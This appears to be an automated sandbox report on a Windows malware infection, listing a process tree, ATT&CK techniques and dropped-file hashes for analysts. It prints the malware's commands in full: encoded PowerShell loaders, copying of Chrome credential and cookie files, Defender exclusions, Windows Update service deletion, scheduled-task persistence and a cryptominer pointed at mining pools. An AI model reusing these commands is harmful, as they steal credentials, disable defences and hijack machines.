C:\Windows\system32\windowspowershell\v1.0\powershell.exe"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBiADAAMQA4ADQAMQBjADcALQBmAGEAZABkAC0ANAA3AGQAZAAtADgAZQA5ADAALQBlADYAZgAzADMAMwA2ADkAZQA4ADUAYwAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEUAQQBBADkALgBlAHgAZQAnADsAdAByAHkAIAB7AA0ACgAgACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQAgAA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAoACIARQByAHIAbwByADoAIAAiACAAKwAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"C:\Users\Admin\AppData\Local\Temp\WindowsUpdate.exe"4⤵
- Executes dropped EXE
PID:4916 -
C:\Windows\system32\windowspowershell\v1.0\powershell.exe"C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwBkAGMANQBiADAAMgAyADQALQBkADgANwA5AC0ANAA1AGQAZgAtADgAMwA4ADIALQBjADMAOQBiADkANgAzAGYAOQA1AGMAYwAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsAdAByAHkAIAB7AA0ACgAgACAAaQBmACAAKABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBnAGUAIAA0ACkADQAKACAAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBVAG4AcwBhAGYAZQBMAG8AYQBkAEYAcgBvAG0AKAAkAHkAKQAgAH0AIABlAGwAcwBlACAAewAgACQAbgB1AGwAbAAgAD0AIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABGAGkAbABlACgAJAB5ACkAfQANAAoAIAAgAC4AIAAoAFsAXwAzADIALgBfADgAOABdADoAOgBfADcANAAoACQAeAApACkADQAKACAAIABlAHgAaQB0ACAAJABMAEEAUwBUAEUAWABJAFQAQwBPAEQARQANAAoAfQAgAA0ACgBjAGEAdABjAGgAIABbAE4AbwB0AFMAdQBwAHAAbwByAHQAZQBkAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAHsADQAKACAAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBBAHAAcABsAGkAYwBhAHQAaQBvAG4AIABsAG8AYwBhAHQAaQBvAG4AIABpAHMAIAB1AG4AdAByAHUAcwB0AGUAZAAuACAAQwBvAHAAeQAgAGYAaQBsAGUAIAB0AG8AIABhACAAbABvAGMAYQBsACAAZAByAGkAdgBlACwAIABhAG4AZAAgAHQAcgB5ACAAYQBnAGEAaQBuAC4AJwAgAC0ARgBvAHIAZQBnAHIAbwB1AG4AZABDAG8AbABvAHIAIABSAGUAZAANAAoAfQANAAoAYwBhAHQAYwBoACAAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAoACIARQByAHIAbwByADoAIAAiACAAKwAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApACAALQBGAG8AcgBlACAAUgBlAGQAIAANAAoAfQA=5⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:512 -
C:\Windows\System\syshost.exe"C:\Windows\System\syshost.exe"6⤵
- Executes dropped EXE
PID:640 -
C:\Windows\system32\cmd.execmd.exe /c "wmic csproduct get uuid"7⤵PID:2820
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid8⤵PID:1428
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption7⤵PID:2372
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"7⤵PID:980
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name8⤵PID:3920
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"7⤵PID:644
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name8⤵PID:4764
-
C:\Windows\system32\cmd.execmd "/c " systeminfo7⤵PID:4368
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:2200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History\" \"C:\Users\Admin\AppData\Local\Temp\XVlBzgbaiC\""7⤵PID:4816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\MRAjWwhTHctcuAx\""7⤵PID:168
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"C:\Users\Admin\AppData\Local\Temp\hxKQFDaFpL\""7⤵PID:3964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\SjFbcXoEFfRsWxP\""7⤵PID:4884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"C:\Users\Admin\AppData\Local\Temp\LDnJObCsNV\""7⤵PID:4328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\lgTeMaPEZQleQYh\""7⤵PID:4512
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data\" \"C:\Users\Admin\AppData\Local\Temp\YzRyWJjPjz\""7⤵PID:2452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\pfRFEgmotaFetHs\""7⤵PID:2016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\bZRjxAwnwe\""7⤵PID:2984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State\" \"C:\Users\Admin\AppData\Local\Temp\krBEmfdzdcEkXBA\""7⤵PID:1564
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "copy \"C:\Users\Admin\AppData\Local\Microsoft\Windows\History\" \"C:\Users\Admin\AppData\Local\Temp\kjQZLCtTMt\""7⤵PID:3220
-
C:\Users\Admin\AppData\Local\Temp\EC31.exeC:\Users\Admin\AppData\Local\Temp\EC31.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:484 -
C:\Users\Admin\AppData\Local\Temp\EC31.exeC:\Users\Admin\AppData\Local\Temp\EC31.exe3⤵
- Executes dropped EXE
PID:1544 -
C:\Users\Admin\AppData\Local\Temp\EC31.exe"C:\Users\Admin\AppData\Local\Temp\EC31.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:212 -
C:\Users\Admin\AppData\Local\Temp\EC31.exe"C:\Users\Admin\AppData\Local\Temp\EC31.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
PID:4508 -
C:\Users\Admin\AppData\Local\ad51491b-0c0a-4991-a312-2e43df87f42c\build3.exe"C:\Users\Admin\AppData\Local\ad51491b-0c0a-4991-a312-2e43df87f42c\build3.exe"6⤵
- Executes dropped EXE
PID:1108 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\F1B0.exeC:\Users\Admin\AppData\Local\Temp\F1B0.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:816 -
C:\Users\Admin\AppData\Local\Temp\461A.exeC:\Users\Admin\AppData\Local\Temp\461A.exe2⤵
- Executes dropped EXE
PID:3800 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3800 -s 7803⤵
- Program crash
PID:4460 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:68
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3232
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:8
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3968
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4012
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2448
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5024
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:3516
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1668 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4320 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4192 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3140 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1772 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1432
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:964
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1660 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:1440
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2444
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4396
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:1264
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4364
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:5108
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3340
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵PID:4932
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2572
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4128
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵PID:3736
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:1316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:5112
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1096
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2864 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3420 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1780 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2084 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3744 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4732
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4808
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:3488
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2072
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4884
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4468
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2804
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2000
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:2820
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:500
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵PID:2612
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵PID:5080
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:3760
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:3300
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:2568
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵PID:3152
-
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exeC:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe1⤵
- Executes dropped EXE
PID:4428
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Executes dropped EXE
PID:4788
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe1⤵
- Executes dropped EXE
PID:2880 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"2⤵
- Creates scheduled task(s)
PID:1996
-
C:\Windows\System\svchost.exeC:\Windows\System\svchost.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe"2⤵PID:2900
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_1 /TR C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe3⤵
- Creates scheduled task(s)
PID:656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe"2⤵PID:5108
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_2 /TR C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe3⤵
- Creates scheduled task(s)
PID:4100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "SCHTASKS.exe /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe"2⤵PID:2980
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /ED 12/12/2030 /TN runtime_3 /TR C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe3⤵
- Creates scheduled task(s)
PID:1308 -
C:\Windows\system32\cmd.execmd.exe /c "wmic csproduct get uuid"2⤵PID:4476
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid3⤵PID:1996
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\conhost\conhost.vbs"1⤵PID:416
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\conhost\conhost.exe --background --disable-gpu --algorithm yespower --pool stratum+tcp://eu-01.miningrigrentals.com:51702 -pool stratum+tcp://eu-de01.miningrigrentals.com:51567 --wallet SpRoot2FA.280711 --cpu-threads 12⤵PID:864
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\conhost\conhost.exeC:\Users\Admin\AppData\Roaming\Microsoft\Crypto\conhost\conhost.exe --background --disable-gpu --algorithm yespower --pool stratum+tcp://eu-01.miningrigrentals.com:51702 -pool stratum+tcp://eu-de01.miningrigrentals.com:51567 --wallet SpRoot2FA.280711 --cpu-threads 13⤵PID:4944
-
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exeC:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe1⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exeC:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe1⤵PID:2000
-
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exeC:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe1⤵PID:4600
-
C:\Users\Admin\AppData\Roaming\bcuudewC:\Users\Admin\AppData\Roaming\bcuudew1⤵PID:4712
-
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exeC:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe1⤵PID:2420
-
C:\Users\Admin\AppData\Roaming\uauudewC:\Users\Admin\AppData\Roaming\uauudew1⤵PID:3248
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
2Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\SystemID\PersonalID.txtFilesize
42B
MD5dbe3661a216d9e3b599178758fadacb4
SHA129fc37cce7bc29551694d17d9eb82d4d470db176
SHA256134967887ca1c9c78f4760e5761c11c2a8195671abccba36fcf3e76df6fff03b
SHA512da90c77c47790b3791ee6cee8aa7d431813f2ee0c314001015158a48a117342b990aaac023b36e610cef71755e609cbf1f6932047c3b4ad4df8779544214687f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
2KB
MD568e313eea846d1d87e47b99bf9bd1b71
SHA1e4fd3856cd8e50ada3fdc37c89019be2e5b13eea
SHA2566c6b183ef044d7020900cee8b53150737c216a0d8e32132eeec39e762421229d
SHA5126c08dedc56308eb2053b38e676abbd2f1c7a55dd56d88b1a580cedcb38f36db217d8f10f01484f13fad63f529ed896b85fd3e0443544ca9eea2ec667f8a89f88
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
1KB
MD5c5ef651a9650eb044382ba31a7fa140f
SHA1c2e582dd129512948a7f5212e948705d932e212e
SHA256a8663f9d52be9bbd3d781dbbe9d090f93236765c1f1d85d74f753ae62781389c
SHA5120d3c06e233c0d00ad599aba749125b4c59f0405e455a2cdf01ea6e009e49544ed8d66c017fb4b09ece5ad6bf62599bcf86578ee46c5cffe79fa6c664c5726f09
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850DFilesize
488B
MD5ababf934b2770215d45d04314ba80c9c
SHA1e904d936bee9a3e66e7e25a09329b606e843d350
SHA256f61833dbe3e0dac2142922aea5cf4b5b684e45a4f3335ae7ecc9f25541992681
SHA5120f40a231cc1a663116d790ec654550d619fdc69ce38891df4b13e3cd17cbe37906d94d56637cac181be407095fd0c1bd60b3371d43bb613cf1b1b6ec23aa92ef
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711EFilesize
482B
MD51d2687511d616c1e45a3b8b451a70345
SHA12be37c4caed7705794105f00e769a3576db2f3a7
SHA25672c5dfd43864e75fc5d5b6d68810082de53fa774814236cc5090fb91729da299
SHA512e81dd58d745b589af760eb70260f01e9be846a3331afefe9e7b4844cc25d1d2672bee875bb2f835d9a394f7c77130984af3b1a09e88b9dce2503abde7e386b10
-
C:\Users\Admin\AppData\Local\80941597-9341-4e71-ab71-7dfd7edb79fa\D1CF.exeFilesize
860KB
MD558f98b05c04545e9843d54e75e5c364c
SHA158e44492f7b3bcddc4cabdca5775a5d7ecb6d035
SHA25665a1a24fd1b04bb47352f7e0e8d0450a232941b6aa7164ddd0b080053eaceec8
